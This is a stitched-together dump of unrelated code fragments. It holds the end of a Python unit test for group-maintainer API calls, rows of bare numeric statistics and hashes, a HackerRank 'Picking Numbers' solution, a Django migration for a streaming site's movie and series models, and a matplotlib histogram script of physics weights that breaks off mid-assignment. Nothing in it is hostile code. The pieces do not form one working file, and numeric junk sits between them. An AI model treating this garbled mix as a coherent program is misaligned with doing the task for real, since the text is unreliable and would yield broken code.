PreparedRequest() mock_resp.status_code = 200 mock_resp.json.return_value = { 'result': True } mock_session.send.return_value = mock_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} self.assertTrue(self.prj.get_is_group_maintainer( 'mygroup', user, url_prefix, auth, mock_session, send_opts)) @patch('requests.Session', autospec=True) def test_get_is_group_maintainer_failure(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 404 mock_session.send.return_value = fake_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.get_is_group_maintainer( 'mygroup', user, url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_delete_group_maintainer_success(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 204 mock_session.send.return_value = fake_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} self.prj.delete_group_maintainer( 'mygroup', user, url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_delete_group_member_failure(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 403 mock_session.send.return_value = fake_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.delete_group_maintainer( 'mygroup', user, url_prefix, auth, mock_session, send_opts) if __name__ == '__main__': unittest.main()
35.585542
81
0.655878
1,752
14,768
5.231735
0.085616
0.115208
0.078551
0.073314
0.914685
0.912285
0.909012
0.904866
0.903775
0.893083
0
0.007616
0.244244
14,768
414
82
35.671498
0.813637
0.039816
0
0.84375
0
0
0.100522
0
0
0
0
0
0.05625
1
0.078125
false
0
0.015625
0
0.096875
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
f93789fced1e4ec0e06ec30060a192c2fa18a980
629
py
Python
Algorithms/2. Implementation/17 - Picking Numbers.py
rosiejh/HackerRank
bfb07b8add04d3f3b67a61754db483f88a79e5a5
[ "Apache-2.0" ]
null
null
null
Algorithms/2. Implementation/17 - Picking Numbers.py
rosiejh/HackerRank
bfb07b8add04d3f3b67a61754db483f88a79e5a5
[ "Apache-2.0" ]
null
null
null
Algorithms/2. Implementation/17 - Picking Numbers.py
rosiejh/HackerRank
bfb07b8add04d3f3b67a61754db483f88a79e5a5
[ "Apache-2.0" ]
null
null
null
from collections import Counter def pickingNumbers(a): keys, values = list(Counter(sorted(a)).keys()), list(Counter(sorted(a)).values()) maxvalue = max(values) for i in range(len(keys) - 1): if keys[i+1] - keys[i] == 1: if maxvalue < values[i] + values[i+1]: maxvalue = values[i] + values[i+1] return maxvalue # OR from collections import Counter def pickingNumbers(a): keys, values = list(Counter(sorted(a)).keys()), list(Counter(sorted(a)).values()) return max([values[i] + values[i+1] for i in range(len(keys) - 1) if keys[i+1] - keys[i] == 1] + [max(values)])
31.45
115
0.610493
94
629
4.085106
0.234043
0.036458
0.177083
0.1875
0.861979
0.822917
0.703125
0.703125
0.703125
0.703125
0
0.018219
0.214626
629
19
116
33.105263
0.759109
0.00318
0
0.461538
0
0
0
0
0
0
0
0
0
1
0.153846
false
0
0.153846
0
0.461538
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
f973c9aa75921b14e7d89b8c86b0976a42edf731
13,374
py
Python
strangeflix/provider/migrations/0001_initial.py
samsoldeinstein/webster2020
9795635e806caa261bb33d629f3d1f2bd603638c
[ "MIT" ]
6
2020-11-02T16:40:56.000Z
2020-11-07T06:59:00.000Z
strangeflix/provider/migrations/0001_initial.py
samsoldeinstein/webster2020
9795635e806caa261bb33d629f3d1f2bd603638c
[ "MIT" ]
null
null
null
strangeflix/provider/migrations/0001_initial.py
samsoldeinstein/webster2020
9795635e806caa261bb33d629f3d1f2bd603638c
[ "MIT" ]
2
2020-11-03T05:20:25.000Z
2020-11-03T05:38:47.000Z
# Generated by Django 3.1.2 on 2020-10-08 19:21 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import provider.models class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='MovieDetails', fields=[ ('movie_id', models.AutoField(primary_key=True, serialize=False)), ('movie_name', models.CharField(max_length=100)), ('description', models.TextField()), ('language', models.PositiveSmallIntegerField(choices=[(1, 'english'), (2, 'hindi'), (3, 'bengali'), (4, 'kannada'), (5, 'malayalam'), (6, 'marathi'), (7, 'tamil'), (8, 'telugu')])), ('date_of_creation', models.DateTimeField()), ('thumbnail_image', models.ImageField(upload_to=provider.models.movie_thumbnail_directory_path)), ('provider_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 'Movie Details', }, ), migrations.CreateModel( name='SeriesDetails', fields=[ ('series_id', models.AutoField(primary_key=True, serialize=False)), ('series_name', models.CharField(max_length=100)), ('description', models.TextField()), ('language', models.PositiveSmallIntegerField(choices=[(1, 'english'), (2, 'hindi'), (3, 'bengali'), (4, 'kannada'), (5, 'malayalam'), (6, 'marathi'), (7, 'tamil'), (8, 'telugu')])), ('category', models.PositiveSmallIntegerField(choices=[(1, 'sports'), (2, 'entertainment')])), ('date_of_creation', models.DateTimeField()), ('thumbnail_image', models.ImageField(upload_to=provider.models.series_thumbnail_directory_path)), ('provider_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 'Series Details', }, ), migrations.CreateModel( name='SeriesSeasonDetails', fields=[ ('series_season_id', models.AutoField(primary_key=True, serialize=False)), ('season_no', models.PositiveSmallIntegerField()), ('description', models.TextField()), ('date_of_creation', models.DateTimeField()), ('thumbnail_image', models.ImageField(upload_to=provider.models.series_season_thumbnail_directory_path)), ('verification_status', models.PositiveSmallIntegerField(choices=[(1, 'pending'), (2, 'verified'), (3, 'rejected'), (4, 'not submitted')])), ('series_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.seriesdetails')), ], options={ 'verbose_name_plural': 'Series Season Details', }, ), migrations.CreateModel( name='Videos', fields=[ ('video_id', models.AutoField(primary_key=True, serialize=False)), ('video_type', models.PositiveSmallIntegerField(choices=[(1, 'free'), (2, 'series'), (3, 'movie')])), ], options={ 'verbose_name_plural': 'Videos', }, ), migrations.CreateModel( name='SeriesVideosTags', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('episode_no', models.PositiveSmallIntegerField()), ('tag_word', models.CharField(max_length=50)), ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')), ], options={ 'verbose_name_plural': 'Series Videos Tags', }, ), migrations.CreateModel( name='SeriesVideos', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('video_name', models.CharField(max_length=100)), ('firebase_save_name', models.CharField(max_length=50)), ('firebase_token', models.CharField(max_length=50)), ('description', models.TextField()), ('thumbnail_image', models.ImageField(upload_to=provider.models.video_thumbnail_directory_path)), ('date_of_upload', models.DateTimeField()), ('date_of_release', models.DateTimeField()), ('episode_no', models.PositiveSmallIntegerField()), ('duration_of_video', models.IntegerField()), ('quality_of_video', models.PositiveSmallIntegerField(choices=[(1, '144'), (2, '240'), (3, '360'), (4, '480'), (5, '720'), (6, '1080')])), ('verification_status', models.PositiveSmallIntegerField(choices=[(1, 'pending'), (2, 'verified'), (3, 'rejected'), (4, 'not submitted')])), ('cost_of_video', models.PositiveSmallIntegerField()), ('series_season_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.seriesseasondetails')), ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')), ], options={ 'verbose_name_plural': 'Series Videos', }, ), migrations.CreateModel( name='SeriesSubCategories', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('sub_category', models.PositiveSmallIntegerField(choices=[(1, 'cricket'), (2, 'football'), (3, 'tennis'), (4, 'martial arts'), (5, 'esports'), (6, 'hockey'), (7, 'badminton'), (8, 'wrestling'), (9, 'kabaddi'), (10, 'table tennis'), (11, 'action'), (12, 'adventure'), (13, 'animation'), (14, 'comedy'), (15, 'crime'), (16, 'drama'), (17, 'horror'), (18, 'romance'), (19, 'thriller')])), ('series_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.seriesdetails')), ], options={ 'verbose_name_plural': 'Series Sub Categories', }, ), migrations.CreateModel( name='MovieVideoTags', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('tag_word', models.CharField(max_length=50)), ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')), ], options={ 'verbose_name_plural': 'Movie Video Tags', }, ), migrations.CreateModel( name='MovieVideo', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('video_name', models.CharField(max_length=100)), ('description', models.TextField()), ('firebase_save_name', models.CharField(max_length=50)), ('firebase_token', models.CharField(max_length=50)), ('thumbnail_image', models.ImageField(upload_to=provider.models.video_thumbnail_directory_path)), ('date_of_upload', models.DateTimeField()), ('date_of_release', models.DateTimeField()), ('duration_of_video', models.IntegerField()), ('quality_of_video', models.PositiveSmallIntegerField(choices=[(1, '144'), (2, '240'), (3, '360'), (4, '480'), (5, '720'), (6, '1080')])), ('verification_status', models.PositiveSmallIntegerField(choices=[(1, 'pending'), (2, 'verified'), (3, 'rejected'), (4, 'not submitted')])), ('cost_of_video', models.PositiveSmallIntegerField()), ('movie_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.moviedetails')), ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')), ], options={ 'verbose_name_plural': 'Movie Video', }, ), migrations.CreateModel( name='MovieSubCategories', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('sub_category', models.PositiveSmallIntegerField(choices=[(1, 'cricket'), (2, 'football'), (3, 'tennis'), (4, 'martial arts'), (5, 'esports'), (6, 'hockey'), (7, 'badminton'), (8, 'wrestling'), (9, 'kabaddi'), (10, 'table tennis'), (11, 'action'), (12, 'adventure'), (13, 'animation'), (14, 'comedy'), (15, 'crime'), (16, 'drama'), (17, 'horror'), (18, 'romance'), (19, 'thriller')])), ('movie_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.moviedetails')), ], options={ 'verbose_name_plural': 'Movie Sub Categories', }, ), migrations.CreateModel( name='FreeSeriesVideosTags', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('tag_word', models.CharField(max_length=50)), ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')), ], options={ 'verbose_name_plural': 'Free Series Videos Tags', }, ), migrations.CreateModel( name='FreeSeriesVideos', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('video_name', models.CharField(max_length=100)), ('firebase_save_name', models.CharField(max_length=50)), ('firebase_token', models.CharField(max_length=50)), ('description', models.TextField()), ('thumbnail_image', models.ImageField(upload_to=provider.models.video_thumbnail_directory_path)), ('date_of_upload', models.DateTimeField()), ('date_of_release', models.DateTimeField()), ('duration_of_video', models.IntegerField()), ('quality_of_video', models.PositiveSmallIntegerField(choices=[(1, '144'), (2, '240'), (3, '360'), (4, '480'), (5, '720'), (6, '1080')])), ('verification_status', models.PositiveSmallIntegerField(choices=[(1, 'pending'), (2, 'verified'), (3, 'rejected'), (4, 'not submitted')])), ('series_season_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.seriesseasondetails')), ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')), ], options={ 'verbose_name_plural': 'Free Series Videos', }, ), migrations.CreateModel( name='FreeMovieVideoTags', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('tag_word', models.CharField(max_length=50)), ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')), ], options={ 'verbose_name_plural': 'Free Movie Video Tags', }, ), migrations.CreateModel( name='FreeMovieVideo', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('video_name', models.CharField(max_length=100)), ('description', models.TextField()), ('firebase_save_name', models.CharField(max_length=50)), ('firebase_token', models.CharField(max_length=50)), ('thumbnail_image', models.ImageField(upload_to=provider.models.video_thumbnail_directory_path)), ('date_of_upload', models.DateTimeField()), ('date_of_release', models.DateTimeField()), ('duration_of_video', models.IntegerField()), ('quality_of_video', models.PositiveSmallIntegerField(choices=[(1, '144'), (2, '240'), (3, '360'), (4, '480'), (5, '720'), (6, '1080')])), ('verification_status', models.PositiveSmallIntegerField(choices=[(1, 'pending'), (2, 'verified'), (3, 'rejected'), (4, 'not submitted')])), ('movie_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.moviedetails')), ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')), ], options={ 'verbose_name_plural': 'Free Movie Video', }, ), ]
58.401747
402
0.574099
1,255
13,374
5.92749
0.130677
0.033338
0.033876
0.053233
0.865573
0.83694
0.821347
0.821347
0.79715
0.79715
0
0.025985
0.263347
13,374
228
403
58.657895
0.729091
0.003365
0
0.705882
1
0
0.211525
0.012231
0
0
0
0
0
1
0
false
0
0.0181
0
0.036199
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
f99097b6c0cc04da92076639d2c552c39556f140
49,704
py
Python
post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_0.py
sheride/axion_pheno
7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5
[ "MIT" ]
null
null
null
post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_0.py
sheride/axion_pheno
7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5
[ "MIT" ]
null
null
null
post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_0.py
sheride/axion_pheno
7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5
[ "MIT" ]
null
null
null
def selection_0(): # Library import import numpy import matplotlib import matplotlib.pyplot as plt import matplotlib.gridspec as gridspec # Library version matplotlib_version = matplotlib.__version__ numpy_version = numpy.__version__ # Histo binning xBinning = numpy.linspace(0.0,2000.0,201,endpoint=True) # Creating data sequence: middle of each bin xData = numpy.array([5.0,15.0,25.0,35.0,45.0,55.0,65.0,75.0,85.0,95.0,105.0,115.0,125.0,135.0,145.0,155.0,165.0,175.0,185.0,195.0,205.0,215.0,225.0,235.0,245.0,255.0,265.0,275.0,285.0,295.0,305.0,315.0,325.0,335.0,345.0,355.0,365.0,375.0,385.0,395.0,405.0,415.0,425.0,435.0,445.0,455.0,465.0,475.0,485.0,495.0,505.0,515.0,525.0,535.0,545.0,555.0,565.0,575.0,585.0,595.0,605.0,615.0,625.0,635.0,645.0,655.0,665.0,675.0,685.0,695.0,705.0,715.0,725.0,735.0,745.0,755.0,765.0,775.0,785.0,795.0,805.0,815.0,825.0,835.0,845.0,855.0,865.0,875.0,885.0,895.0,905.0,915.0,925.0,935.0,945.0,955.0,965.0,975.0,985.0,995.0,1005.0,1015.0,1025.0,1035.0,1045.0,1055.0,1065.0,1075.0,1085.0,1095.0,1105.0,1115.0,1125.0,1135.0,1145.0,1155.0,1165.0,1175.0,1185.0,1195.0,1205.0,1215.0,1225.0,1235.0,1245.0,1255.0,1265.0,1275.0,1285.0,1295.0,1305.0,1315.0,1325.0,1335.0,1345.0,1355.0,1365.0,1375.0,1385.0,1395.0,1405.0,1415.0,1425.0,1435.0,1445.0,1455.0,1465.0,1475.0,1485.0,1495.0,1505.0,1515.0,1525.0,1535.0,1545.0,1555.0,1565.0,1575.0,1585.0,1595.0,1605.0,1615.0,1625.0,1635.0,1645.0,1655.0,1665.0,1675.0,1685.0,1695.0,1705.0,1715.0,1725.0,1735.0,1745.0,1755.0,1765.0,1775.0,1785.0,1795.0,1805.0,1815.0,1825.0,1835.0,1845.0,1855.0,1865.0,1875.0,1885.0,1895.0,1905.0,1915.0,1925.0,1935.0,1945.0,1955.0,1965.0,1975.0,1985.0,1995.0]) # Creating weights for histo: y1_PT_0 y1_PT_0_weights = numpy.array([0.0,0.0,0.291889811312,0.603239140711,0.714687929757,0.774834723846,0.930509508545,1.11271949064,1.01719190003,1.21709188038,1.23124427899,1.23124427899,1.29669827255,1.34800026751,1.35153826716,1.34269306803,1.3745358649,1.44706585778,1.37984266438,1.37099746525,1.3674594656,1.31969587029,1.41345426108,1.33738586856,1.35507626682,1.39222586317,1.39045706334,1.16402108559,1.21001588107,1.22593707951,1.2524726769,1.22416827968,1.22770627934,1.14986908699,1.12510268942,1.09856709203,1.00127070159,1.01011550072,1.00480870124,0.912819110284,0.884514713066,0.872131514283,0.850903116369,0.840288717413,0.801370321238,0.780141923324,0.707611530453,0.762451525063,0.728839928366,0.693459531844,0.7040735308,0.622698338798,0.597931941232,0.610315140015,0.573165543667,0.576703543319,0.569627544014,0.505942350274,0.521863548709,0.428105157924,0.5077115501,0.410414759663,0.421028758619,0.424567158272,0.366189044009,0.413952759315,0.339653606617,0.325501368008,0.34319164627,0.399800600706,0.355574845052,0.344960686096,0.359112924705,0.284813692007,0.364420004183,0.272430493224,0.251202135311,0.212283499136,0.24235701618,0.235280896876,0.21935961844,0.238818936528,0.208745459484,0.235280896876,0.214052538962,0.237049896702,0.171595823135,0.18751710157,0.18751710157,0.175133902787,0.16451970383,0.162750704004,0.166288743656,0.129139147308,0.162750704004,0.129139147308,0.127370107481,0.122063028003,0.148598465395,0.127370107481,0.0955275906111,0.102603709916,0.125601067655,0.123832027829,0.0972965904372,0.104372709742,0.111448829046,0.0742992326975,0.0866824314805,0.0972965904372,0.0919895109588,0.0778372723498,0.0689921532191,0.0778372723498,0.0778372723498,0.0566089144362,0.0601469940885,0.0566089144362,0.067223113393,0.0477637953056,0.0513018349578,0.0513018349578,0.067223113393,0.0495328351317,0.0530708747839,0.0513018349578,0.040687676001,0.0513018349578,0.0548399146101,0.0371496123488,0.040687676001,0.0336115526965,0.0283044652181,0.0513018349578,0.0300734970442,0.0318425248704,0.0336115526965,0.0123832027829,0.0353805845226,0.0247664095658,0.0371496123488,0.0371496123488,0.0194593220874,0.0247664095658,0.0283044652181,0.0283044652181,0.0159212624352,0.0336115526965,0.026535437392,0.0141522346091,0.0141522346091,0.0229973777397,0.0106141749568,0.0141522346091,0.0229973777397,0.0194593220874,0.0123832027829,0.0159212624352,0.0106141749568,0.0123832027829,0.0159212624352,0.00707611530453,0.0141522346091,0.0123832027829,0.0106141749568,0.0123832027829,0.0141522346091,0.0106141749568,0.00707611530453,0.0123832027829,0.00530708747839,0.0176902902613,0.0123832027829,0.00884514713066,0.00884514713066,0.0106141749568,0.00884514713066,0.00530708747839,0.00884514713066,0.00176902902613,0.0106141749568,0.00707611530453,0.00530708747839,0.00884514713066,0.00530708747839,0.00530708747839,0.00353805845226,0.00176902902613,0.00530708747839,0.00353805845226,0.00353805845226,0.00530708747839,0.00707611530453,0.00353805845226,0.00353805845226,0.00176902902613,0.00707611530453,0.00884514713066,0.00353805845226,0.00353805845226]) # Creating weights for histo: y1_PT_1 y1_PT_1_weights = numpy.array([0.0,0.0,0.182720118359,0.371879215911,0.503306166146,0.563096430287,0.590913421521,0.647556198579,0.730882871522,0.744792566182,0.799309440536,0.824958962253,0.855874279819,0.846316310792,0.886898710271,0.87941908192,0.866631691225,0.952092660171,0.936064656744,0.875190458004,0.910485878547,0.872993811782,0.919008674045,0.901847575269,0.892230053787,0.883758417444,0.798256681047,0.841958190265,0.790739482692,0.795000880441,0.741563544196,0.696721345691,0.742671059968,0.686003902375,0.672150163041,0.621917468246,0.676373191423,0.594121260419,0.597356277619,0.556752295371,0.543923337863,0.530022436183,0.508668684773,0.462717371772,0.519326575635,0.517196276442,0.472282535056,0.425284058099,0.455193778523,0.406070198224,0.426363596209,0.433869203818,0.355822035779,0.377232621814,0.366519215274,0.350522227085,0.330185783468,0.313086555295,0.314180042268,0.26822009616,0.287456777815,0.267126529251,0.27888474163,0.256449853387,0.230786982328,0.262889711878,0.234002535067,0.222274138884,0.236151779136,0.189141791369,0.21479415082,0.177401444727,0.207285985254,0.175248763403,0.164555420845,0.15924641949,0.14533276799,0.151717070836,0.154950409375,0.145333207639,0.138925003875,0.138921286842,0.116459060426,0.118608344462,0.133575195101,0.123950359459,0.0993890888946,0.0983038353485,0.110053174811,0.104726267752,0.107918159383,0.0747900085174,0.0758752620635,0.0865491001939,0.0780021639694,0.087623722228,0.075865270041,0.0801492097928,0.084411127127,0.0844291127674,0.0577099250596,0.0566361823234,0.0726531145889,0.0577091656659,0.0619729215322,0.0534225880202,0.0662602585717,0.0427301247599,0.0427420752188,0.0448752121468,0.0459455575953,0.0427502686772,0.0395497359457,0.0288500344643,0.0427423949635,0.0416762061963,0.0352679904421,0.0374008116222,0.0352676587069,0.0256454329813,0.03205583499,0.0299271784849,0.0352645971512,0.0245777094395,0.0309896422261,0.0320562666454,0.0406073795352,0.0235092225071,0.0277816474522,0.0309911730039,0.0213667530301,0.0224374382074,0.0245800076046,0.0138982797733,0.0235137149205,0.0128249646957,0.0203008920013,0.0213753062014,0.0203083460501,0.0181654449177,0.0170947597404,0.0160281353211,0.0170988204984,0.0202967313232,0.017104080299,0.0192335001947,0.0106839260763,0.0138937833632,0.0160299978341,0.0128257280862,0.0160258371559,0.0053397168315,0.0128220030602,0.0064137952996,0.00962069494781,0.00747812555057,0.00427122590237,0.00320689804948,0.0149649041926,0.00962628648359,0.00961883243482,0.00213917490736,0.00534234673182,0.00534530836728,0.00640930288629,0.0128220030602,0.00641116539928,0.00748151884141,0.00961280524685,0.00854771160537,0.0085447499699,0.00534048022202,0.00320689804948,0.00427462319001,0.00640667298598,0.00320426894853,0.00320426894853,0.00427275668021,0.00106958725384,0.00534420924481,0.00320503433745,0.00534157934449,0.0064137952996,0.00427385580268,0.00320503433745,0.00534004856664,0.00427199328969,0.004276485703,0.00213654540672,0.00427462319001,0.0,0.0010677235418,0.00320689804948,0.00320503433745,0.00106958725384,0.00106958725384,0.00106958725384,0.00534420924481,0.0032087621612,0.00213544708361]) # Creating weights for histo: y1_PT_2 y1_PT_2_weights = numpy.array([0.0,0.0,0.107641666146,0.263895704101,0.334036401138,0.402093697669,0.404177298175,0.463206512514,0.50209612196,0.517374525671,0.527096928033,0.600015345745,0.561820136467,0.618071350131,0.580570541022,0.628488552661,0.626404952155,0.600710145914,0.604182146757,0.619460550468,0.636822154685,0.628488552661,0.58682054254,0.556958935286,0.542375331744,0.582654141528,0.537513730563,0.565986937479,0.536819330394,0.537513730563,0.51251332449,0.490984919261,0.47570691555,0.460428511839,0.425705303405,0.434733305598,0.405566098513,0.388204494296,0.373620770753,0.362509368054,0.374315250922,0.35417584603,0.347231204343,0.333341960969,0.331953040632,0.315980396752,0.304174553885,0.319452717596,0.288201910005,0.281951748487,0.267368024944,0.252784301402,0.243756299209,0.217366732799,0.235422737185,0.218061212967,0.21667225263,0.201394088919,0.186810405377,0.19583840757,0.196532847738,0.170143281328,0.172921122003,0.157642958292,0.160420798967,0.138198033569,0.142364794581,0.124308790195,0.136809113231,0.139586953906,0.132642312219,0.138892473737,0.124308790195,0.107641666146,0.118058628677,0.107641666146,0.0972247436161,0.102085984797,0.11111398699,0.09514134311,0.0805576195676,0.0854188607484,0.0895856617605,0.0736130178807,0.0756964183868,0.059723774507,0.0777797788929,0.0673628563626,0.059723774507,0.0590292943383,0.0527791328201,0.0562514536636,0.0625016151818,0.0506957723141,0.0625016151818,0.059723774507,0.0513902124828,0.046528971302,0.0513902124828,0.0347231204343,0.046528971302,0.0451400509646,0.0395843576151,0.0402788097838,0.0312508075909,0.0395843576151,0.0340286562656,0.0388898934464,0.0319452717596,0.0361120447717,0.0333341960969,0.0256951102414,0.0215283332293,0.0291674190848,0.0291674190848,0.0291674190848,0.0250006460727,0.024306185904,0.024306185904,0.0180560243858,0.0208338730606,0.0187504845545,0.0256951102414,0.0236117217353,0.022222797398,0.0159726358798,0.0166670960485,0.00833355002423,0.0125003230364,0.00972247436161,0.0173615602172,0.0152781717111,0.0145837115424,0.0208338730606,0.013194787205,0.00763908585555,0.0104169345303,0.00763908585555,0.0118058628677,0.0125003230364,0.0152781717111,0.00972247436161,0.00902801019292,0.00763908585555,0.00347231204343,0.011111398699,0.0104169345303,0.00555569734949,0.00902801019292,0.00833355002423,0.00833355002423,0.00833355002423,0.00694462568686,0.00555569734949,0.00277784947474,0.0125003230364,0.0048612371808,0.00555569734949,0.00555569734949,0.00555569734949,0.00208338730606,0.00625016151818,0.00347231204343,0.00555569734949,0.00208338730606,0.00277784947474,0.00416677301212,0.00277784947474,0.00138892473737,0.00833355002423,0.00277784947474,0.0048612371808,0.00347231204343,0.00208338730606,0.00277784947474,0.00416677301212,0.00138892473737,0.00347231204343,0.00277784947474,0.000694462568686,0.00277784947474,0.00208338730606,0.00416677301212,0.00208338730606,0.00138892473737,0.00347231204343,0.00277784947474,0.00138892473737,0.0,0.00208338730606,0.00208338730606,0.00208338730606,0.0,0.00138892473737,0.0,0.00208338730606,0.0,0.00138892473737,0.0,0.00138892473737]) # Creating weights for histo: y1_PT_3 y1_PT_3_weights = numpy.array([0.0,0.0,0.0829772228614,0.187765611732,0.235655344926,0.27595855603,0.286864119035,0.347081895626,0.332383051576,0.3575132985,0.386910946599,0.399713150127,0.400187310257,0.429584918357,0.449973723974,0.444283722406,0.444758122537,0.429584918357,0.434800519794,0.412989713785,0.426740117573,0.407299712217,0.414886114307,0.415834514568,0.408248112478,0.398290709735,0.39497158882,0.37221214255,0.373634622942,0.360832419414,0.360832419414,0.314365166612,0.34281449445,0.323374129094,0.306304524391,0.309623605306,0.294450641125,0.26078559185,0.285915838774,0.264104672765,0.261259711981,0.233758704404,0.241345186494,0.240871026363,0.221904821138,0.225698062183,0.210525098003,0.204835216435,0.183498210556,0.181127449903,0.181601610034,0.170696007029,0.165954445723,0.14177251906,0.147936560759,0.153152242196,0.132763556578,0.142246679191,0.132763556578,0.130866956056,0.117590592398,0.11948719292,0.117590592398,0.115219791745,0.100046827564,0.102417588217,0.102891748348,0.0910378650822,0.0768132211631,0.0806064622082,0.0820289026001,0.095305266258,0.0862963037759,0.0753907407712,0.0734941002487,0.0697008592036,0.0635368575053,0.0630626973747,0.0663817782891,0.0711233395955,0.0630626973747,0.057372815807,0.0497863337168,0.0464672528024,0.0526312545007,0.0488380134556,0.0493121735862,0.0426740117573,0.0474155730637,0.0450447724105,0.0445706122798,0.0369841341897,0.0341392014058,0.0350875136671,0.0374582903203,0.0360358259284,0.0303459563607,0.0327167370139,0.0293976480995,0.0303459563607,0.026078559185,0.0256044030544,0.0251302469237,0.0289234919688,0.0275010235769,0.0265527113156,0.020862845748,0.0199145334867,0.0175437568336,0.0213370018786,0.0184920690948,0.0189662252255,0.0137505117885,0.020862845748,0.0123280433966,0.0146988240497,0.0142246679191,0.0161212884416,0.0165954445723,0.0146988240497,0.0161212884416,0.0184920690948,0.0128021995272,0.0109055790046,0.0118538912659,0.00758649009019,0.00995726674337,0.00806064622082,0.00900895448209,0.00711233395955,0.0142246679191,0.0113797351353,0.00995726674337,0.00806064622082,0.0118538912659,0.00711233395955,0.00758649009019,0.0118538912659,0.005215713437,0.00663817782891,0.00711233395955,0.00758649009019,0.00900895448209,0.00426740117573,0.00806064622082,0.00616402169828,0.00568986556764,0.00568986556764,0.00379324464509,0.00568986556764,0.00758649009019,0.00426740117573,0.00568986556764,0.005215713437,0.00426740117573,0.005215713437,0.00474155730637,0.005215713437,0.00237077785318,0.00616402169828,0.00474155730637,0.00426740117573,0.00474155730637,0.00284493358382,0.00189662252255,0.00379324464509,0.00284493358382,0.00142246679191,0.00237077785318,0.00142246679191,0.00189662252255,0.00142246679191,0.00142246679191,0.000948311061273,0.00284493358382,0.00237077785318,0.00237077785318,0.00237077785318,0.000948311061273,0.00189662252255,0.00142246679191,0.000948311061273,0.00142246679191,0.00189662252255,0.00142246679191,0.000948311061273,0.00189662252255,0.000474155730637,0.00237077785318,0.000948311061273,0.00237077785318,0.0,0.000948311061273,0.000948311061273,0.0,0.00142246679191,0.0,0.000948311061273,0.000948311061273,0.000474155730637]) # Creating weights for histo: y1_PT_4 y1_PT_4_weights = 